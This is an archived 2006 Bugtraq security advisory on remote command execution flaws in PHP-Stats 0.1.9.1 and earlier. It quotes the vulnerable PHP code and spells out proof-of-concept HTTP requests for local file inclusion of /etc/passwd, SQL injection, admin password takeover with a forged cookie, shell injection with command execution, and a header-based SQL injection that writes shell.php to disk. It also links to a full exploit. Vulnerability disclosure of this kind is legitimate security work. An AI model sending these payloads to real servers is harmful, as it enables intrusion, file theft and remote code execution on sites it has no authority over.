lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060304055509.17371.qmail@securityfocus.com>
Date: 4 Mar 2006 05:55:09 -0000
From: rgod@...istici.org
To: bugtraq@...urityfocus.com
Subject: PHP-Stats <= 0.1.9.1 remote commands execution


------------- PHP-Stats <= 0.1.9.1 remote commands execution -------------------

software:
site: http://www.phpstats.net/
description: Open source statistical package for PHP enabled web sites
--------------------------------------------------------------------------------
i) vulnerable code in admin.php (and in nearly every scripts...) at line 65:

...
if(isset($_POST['option'])) { while (list ($key, $value) = each ($tmpOption)) $option[$key]=$value; }
...

you can overwrite at run-time the "option[]" array...,
raising SQL injection, arbitrary local inclusion and php injection issues, poc:

i.a) arbitrary local inclusion (with magic_quotes_gpc off):

i.a1)
POST [path]admin.php?do=0 HTTP/1.1\r\n";
Content-Type: application/x-www-form-urlencoded
Host: [somehost]
Content-Length: [data_length]
Connection: Close

option=&option[clear_cache]=1&option[language]=../../../../../../etc/passwd[null char]

i.a2)
POST [path]admin.php?do=0 HTTP/1.1\r\n";
Content-Type: application/x-www-form-urlencoded
Host: [somehost]
Content-Length: [data_length]
Connection: Close

option=&option[template]=../../../../../../etc/passwd[null char]

i.b) SQL injection - you can inject arbitrary SQL commands through the table
prefix, regardless of magic_quotes_gpc settings:

POST [path]admin.php?do=0 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: [somehost]
Content-Length: [data_length]
Connection: Close

option=&option[prefix]=[SQL]

i.c) PHP code injection - you can grant administrative privileges, overwriting
"option[admin_pass]" value and building a MD5 admin cookie on new value.
Now you can inject a shell in two different ways by administrative features,
poc:

i.c1)
POST [path]admin.php?action=esclusioni&opzioni=excfol HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: php_stats_cache=1; pass_cookie=[md5 hash of "suntzu"]
Host: [somehost]
Content-Length: [data_length]
Connection: Close

option=&option[admin_pass]=suntzu&option_new=[SHELL]

now you can launch commands including option/php-stats-options.php script,poc:

POST [path]admin.php?cmd=netstat%20-ano&do=0 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: [somehost]
Content-Length: [data_length]
Connection: Close

option=&option[language]=../option/php-stats-options.php[null char]

i.c2) the most chritical, this works regardless of any php.ini settings, you
can inject a shell in config.php and launch commands from it.
Poc exploit here:

http://retrogod.altervista.org/php_stats_0191_xpl.html

--------------------------------------------------------------------------------
ii) vulnerable code in click.php at line 18:

...
 if(isset($_SERVER['REMOTE_ADDR'])) $ip=(isset($_SERVER['HTTP_PC_REMOTE_ADDR']) ? $_SERVER['HTTP_PC_REMOTE_ADDR'] : $_SERVER['REMOTE_ADDR']);
...

and line 65:

...
$result=sql_query("SELECT visitor_id FROM $option[prefix]_cache WHERE user_id='$ip' LIMIT 1");
...

you can inject sql commands through PC_REMOTE_ADDR http header, poc:

GET [path]click.php?id=1&get=1 HTTP/1.1
PC_REMOTE_ADDR: 'UNION SELECT '[code]'INTO OUTFILE 'shell.php' FROM php_stats_cache/*
Host: [host]
Connection: Close

--------------------------------------------------------------------------------
iii) information disclosure, you can go to:

http://[target]/[path]/checktables.php

to see at screen database table_prefix, making easier the exploitation process...

--------------------------------------------------------------------------------
rgod

site: http://retrogod.altervista.org
mail: rgod at autistici.org
original advisory: http://retrogod.altervista.org/php_stats_0191_adv.html
--------------------------------------------------------------------------------




Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ